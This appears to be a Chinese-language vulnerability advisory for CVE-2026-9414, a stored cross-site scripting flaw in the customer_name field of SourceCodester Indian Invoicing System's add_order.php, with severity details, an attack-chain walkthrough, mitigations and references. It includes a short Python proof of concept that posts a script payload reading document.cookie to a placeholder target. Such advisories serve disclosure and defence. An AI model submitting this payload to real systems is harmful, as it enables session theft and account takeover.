CVE-2026-9414 SourceCodester Indian Invoicing System XSS漏洞

漏洞信息

漏洞编号

CVE-2026-9414

漏洞类型

跨站脚本 (XSS)

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

SourceCodester Indian Invoicing System

漏洞概述

SourceCodester Indian Invoicing System在0.x至1.0版本中存在一处安全漏洞。该漏洞位于处理订单添加的组件中，具体受影响的文件是/Invoicing/add_order.php。由于系统未对输入参数customer_name进行严格的过滤和转义处理，攻击者能够利用该缺陷注入恶意的JavaScript代码。该攻击可远程发起，且目前已有公开的利用代码发布，建议相关用户尽快采取措施以降低风险。

技术细节

该漏洞属于典型的存储型跨站脚本攻击。漏洞根源在于SourceCodester Indian Invoicing System后端未能正确处理用户输入的数据。具体而言，在/Invoicing/add_order.php文件中，系统接收通过Invoice Template Render组件提交的customer_name参数时，缺乏必要的安全过滤机制（如HTML实体编码）。攻击者可以将恶意的JavaScript代码注入到customer_name字段中。由于数据被存储在数据库中，当具有查看权限的用户（如管理员）访问渲染该发票数据的页面时，恶意脚本便会自动在受害者浏览器中执行。攻击者利用此漏洞可以窃取用户的Session Cookie，进而接管账户权限，或者进行钓鱼攻击。鉴于CVSS评分较低，利用该漏洞需要具备低权限账户且需诱导用户进行交互，但结合公开的Exploit代码，其潜在风险仍不容忽视。

攻击链分析

STEP 1

1. 侦察与准备

攻击者确认目标系统使用的是SourceCodester Indian Invoicing System 0.x到1.0版本，并获取一个低权限账户。

STEP 2

2. 恶意注入

攻击者访问/Invoicing/add_order.php页面，在customer_name参数中注入精心构造的JavaScript恶意代码（如窃取Cookie的脚本）并提交订单。

STEP 3

3. 存储与等待

由于缺乏过滤，恶意代码被持久化存储在数据库的Invoice Template组件中。

STEP 4

4. 触发漏洞

攻击者诱导管理员或相关权限用户访问包含该恶意订单的发票模板渲染页面。

STEP 5

5. 执行攻击

受害者的浏览器解析渲染页面时，执行恶意脚本，导致敏感信息泄露或会话被劫持。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Exploit Title: SourceCodester Indian Invoicing System Stored XSS PoC
# Description: Inject script into customer_name parameter

import requests

target_url = "http://target-site/Invoicing/add_order.php"
payload = "<script>alert(document.cookie);</script>"

# Prepare the data payload
data = {
    "customer_name": payload,
    # Include other necessary parameters for the order submission
    "amount": "100",
    "submit": "submit"
}

try:
    # Send the malicious request to store the payload
    response = requests.post(target_url, data=data)
    
    if response.status_code == 200:
        print("[+] Payload sent successfully.")
        print("[+] Navigate to the invoice rendering page to trigger the XSS.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

SourceCodester Indian Invoicing System 0.x

SourceCodester Indian Invoicing System 1.0

防御指南

临时缓解措施

建议管理员暂时限制对/Invoicing/add_order.php的访问权限，或部署Web应用防火墙（WAF）规则以拦截针对customer_name参数的恶意脚本注入尝试，直到官方修复补丁可用。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-9414
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-9414
3 Details https://www.cvedetails.com/cve/CVE-2026-9414/
4 VulDB https://vuldb.com/cve/CVE-2026-9414
5 Link https://gist.github.com/c4ttr4ck/97c5babe1f16fa3243333528a40b7550
6 Link https://vuldb.com/submit/813610
7 Link https://vuldb.com/vuln/365395
8 Link https://vuldb.com/vuln/365395/cti
9 Link https://www.sourcecodester.com/